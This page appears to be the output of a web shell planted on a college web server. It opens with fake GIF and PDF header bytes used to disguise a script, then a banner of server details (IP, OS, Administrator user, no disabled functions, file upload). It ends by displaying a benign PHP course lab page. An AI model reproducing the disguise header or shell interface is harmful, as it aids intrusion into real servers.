GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/JimMartinson/_Archive/MMDT1144/Labs/Lab03.old/ |
Upload File : |
<? // JimMartinson/MMDT1144/Labs/Lab03/Lab03.phpinc $TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n"; ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path. include('application.phpinc'); $css .= ',colorCode.css'; require('Gradebook/EvaluationSubmission_BEGIN.phpinc'); // Replaced. ?> <a name="Lab"></a> <fieldset><legend>Description</legend> Demonstrate the ability to create a website.<br> <?=$gradeNote?> </fieldset> <? $ShowSpanCountBefore = false; #$ShowSpanCountBefore = true; ?> <fieldset><legend><?=$evaluationType?> Instruction</legend> <span class="bold attention">Do not perform this lab until Lab 2 has been graded.</span> <br>Create a website. <ol id="main" class="count"> <li>Remove all files from your remote server directory.</li> <li>Create a site to show your assignments.</li> <li>Create an index with links to your lab assignments.</li> <li>Include links for labs 3 thru 6. The links should point to the lab directory. These links should not be available until the labs are submitted. You can see my example at <a href="http://cst.ridgewater.edu/Student/JimMartinson/" target="_blank">http://cst.ridgewater.edu/Student/JimMartinson/</a>.</li> <li>Upload it to the remote server.</li> <li>Turn in your assignment: <ol type="a"> <li>Ensure you have uploaded all work to your site (<a href="http://cst.ridgewater.edu/Student/<?=$userFileName?>/">http://cst.ridgewater.edu/Student/<?=$userFileName?>/</a>).</li> <li>Then <input type="submit" name="f_subtask" id="inpSubmit" value="Submit"> for grading.</li> </ol> </li> </ol> <?=$gradeNote?> </fieldset> <script src="/js/colorCode.js"></script> <? require('Gradebook/EvaluationSubmission_END.phpinc'); // Replaced. if ($TRACK != '') $_SESSION['TRACK'] .= "<li>End ".basename(__FILE__)."</ol>\n"; ?>